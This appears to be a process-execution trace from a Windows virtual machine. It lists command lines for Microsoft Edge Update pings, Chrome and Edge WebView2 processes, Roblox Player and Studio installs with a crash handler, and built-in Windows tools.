"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InszOUQwQ0M1OS00OTVBLTQ1MDctOEIwMS0zMTZEMzIyQTU4QjB9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEwNi4wLjUyNDkuMTE5IiBuZXh0dmVyc2lvbj0iMTA2LjAuNTI0OS4xMTkiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIzIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTA1NTIxNTM4Ii8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5764 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=126.0.6478.114 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=126.0.2592.68 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ff78bb9aa40,0x7ff78bb9aa4c,0x7ff78bb9aa58

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InsxRjJDNUI0RS1BNzM1LTQxQzgtOEQwMy03NkZCNDE0OThGMDl9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O1ZQUW9QMUYrZnExNXdSemgxa1BMNFBNcFdoOE9STUI1aXp2ck9DL2NoalE9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEyNi4wLjI1OTIuNjgiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjY1NDAzMzE2MzkiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTQwNDIxODA0IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzI4MjAxMzY0NCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmYudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvYWM2ZjYxMWItZWViNy00YTQyLWE2ZDQtOGNkNzE0Mjk2YTExP1AxPTE3MjAwNDk4NTImYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9bU1SQThtWG9oNTBlbmdoMEN0YnhHN29tRFJlb3JYUHNvMjN4ajNHT0Y5SVl1JTJmTTdpQU90bnFzeWRhcjlLSDF6Qk9RREVSMEFsZE1QQVExdWZoWWt6ZyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE3Mjk1NzI0MCIgdG90YWw9IjE3Mjk1NzI0MCIgZG93bmxvYWRfdGltZV9tcz0iNzAyMzEiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3MjgyMDkzNDkyIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzI5NTY1Mzc5MiIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzcwMDg3ODQyNiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjgzOSIgZG93bmxvYWRfdGltZV9tcz0iNzQxNjQiIGRvd25sb2FkZWQ9IjE3Mjk1NzI0MCIgdG90YWw9IjE3Mjk1NzI0MCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNDA1MTkiLz48L2FwcD48L3JlcXVlc3Q-

C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe

"C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe" -app -isInstallerLaunch

C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe

"C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"

C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe

"C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4872 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5188 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1

C:\Windows\system32\SystemPropertiesRemote.exe

"C:\Windows\system32\SystemPropertiesRemote.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc

C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe

"C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B03F6FE8-253D-4C99-BADE-CFBCA90582C0}\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B03F6FE8-253D-4C99-BADE-CFBCA90582C0}\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe" /update /sessionid "{681D8A3C-184C-4883-8C7D-55AA3487F1EC}"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NjgxRDhBM0MtMTg0Qy00ODgzLThDN0QtNTVBQTM0ODdGMUVDfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntFMTQxMzIwQi1CMDNGLTRGRjEtQUE5MS00OUFENzMzQjIxMzF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNzEuMzkiIG5leHR2ZXJzaW9uPSIxLjMuMTg3LjQxIiBsYW5nPSIiIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjAiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijk2NDI1NzUxMzEiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iOTY0MjY2NTAwMSIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMDA2MDM4ODQ1MSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvNGFkOWNiNmUtODI0NS00ZTQ3LWIyOTgtMWZmNGIwNDI1NmUxP1AxPTE3MjAwNTAxNjMmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9bDBacnN2eXNzZ0YwcXRpOUtyZFVhdW51d1JtSHBVM1lxcWdHZmRiNE11dWN1RE9qbEx2anE0ek9HUSUyZjduSExjRHZMYkNCNklaYjRvYXJZdkpSZ1VxZyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE2MzQzNzYiIHRvdGFsPSIxNjM0Mzc2IiBkb3dubG9hZF90aW1lX21zPSIzOTU1NiIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMDA2MDU0NDY5NyIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMDA2NTcwMTM4MCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxwaW5nIHI9Ii0xIiByZD0iLTEiLz48L2FwcD48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iMTI2LjAuMjU5Mi42OCIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSIwIiBpbnN0YWxsZGF0ZT0iNjM4NCI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSItMSIgcmQ9Ii0xIiBwaW5nX2ZyZXNobmVzcz0iezMwQjIyMjgwLTMzRjQtNEY0Ny1CM0E1LTZGMTI0NjdBMTRENX0iLz48L2FwcD48L3JlcXVlc3Q-

C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{681D8A3C-184C-4883-8C7D-55AA3487F1EC}"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuNDEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NjgxRDhBM0MtMTg0Qy00ODgzLThDN0QtNTVBQTM0ODdGMUVDfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7QTQ0OURFMTAtNTAyNC00MEQxLUI2MEYtN0E3RjUxMzQ1REQ1fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IlFFTVUiIHByb2R1Y3RfbmFtZT0iU3RhbmRhcmQgUEMgKFEzNSArIElDSDksIDIwMDkpIi8-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTcxLjM5IiBuZXh0dmVyc2lvbj0iMS4zLjE4Ny40MSIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjAiIGluc3RhbGxkYXRlPSI2Mzg0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3MTk0NDUwNDciPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwMTA1Mzg4Mzg3Ii8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe

"C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe"

C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe

C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe -relaunch

C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe

"C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe" -startEvent www.roblox.com/robloxQTStudioStartedEvent -firstLaunch

C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe

"C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe" --no-rate-limit --crashCounter Win-ROBLOXStudio-Crash --baseUrl https://www.roblox.com --attachment=attachment_0.630.0.6300556_20240626T234409Z_Studio_6ED98_last.log=C:\Users\Admin\AppData\Local\Roblox\logs\0.630.0.6300556_20240626T234409Z_Studio_6ED98_last.log --attachment=attachment_log_0.630.0.6300556_20240626T234409Z_Studio_6ED98_csg3.log=C:\Users\Admin\AppData\Local\Roblox\logs\log_0.630.0.6300556_20240626T234409Z_Studio_6ED98_csg3.log --database=C:\Users\Admin\AppData\Local\Roblox\logs\crashes --metrics-dir=C:\Users\Admin\AppData\Local\Roblox\logs\crashes --url=https://upload.crashes.rbxinfra.com/post?format=minidump --annotation=AppVersion=0.630.0.6300556 --annotation=Format=minidump --annotation=HardwareModel= --annotation=HasBootstrapper=true --annotation=InstallFolder=ProgramFilesX86 --annotation=OSPlatform=Windows --annotation=RobloxChannel=production --annotation=RobloxGitHash=ad847d7f5168ecfb2a8f42c2d912f9c436294a66 --annotation=RobloxProduct=RobloxStudio --annotation=StudioVersion=0.630.0.6300556 --annotation=UniqueId=557177522507117585 --annotation=UseCrashpad=True --annotation=app_arch=x86_64 --annotation=application.version=0.630.0.6300556 --annotation=host_arch=x86_64 --initial-client-data=0x4e0,0x4e4,0x4e8,0x42c,0x504,0x7ff7e74d3720,0x7ff7e74d3738,0x7ff7e74d3750

C:\Windows\System32\GameBarPresenceWriter.exe

"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer

C:\Windows\System32\GamePanel.exe

"C:\Windows\System32\GamePanel.exe" 00000000000B02B8 /startuptips

C:\Windows\System32\bcastdvr.exe

"C:\Windows\System32\bcastdvr.exe" -ServerName:Windows.Media.Capture.Internal.BroadcastDVRServer

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=2372.3620.6969348788263939955

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=126.0.6478.114 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=126.0.2592.68 --initial-client-data=0x11c,0x120,0x124,0x104,0x12c,0x7ffdcb9c0148,0x7ffdcb9c0154,0x7ffdcb9c0160

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1676,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1668 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe

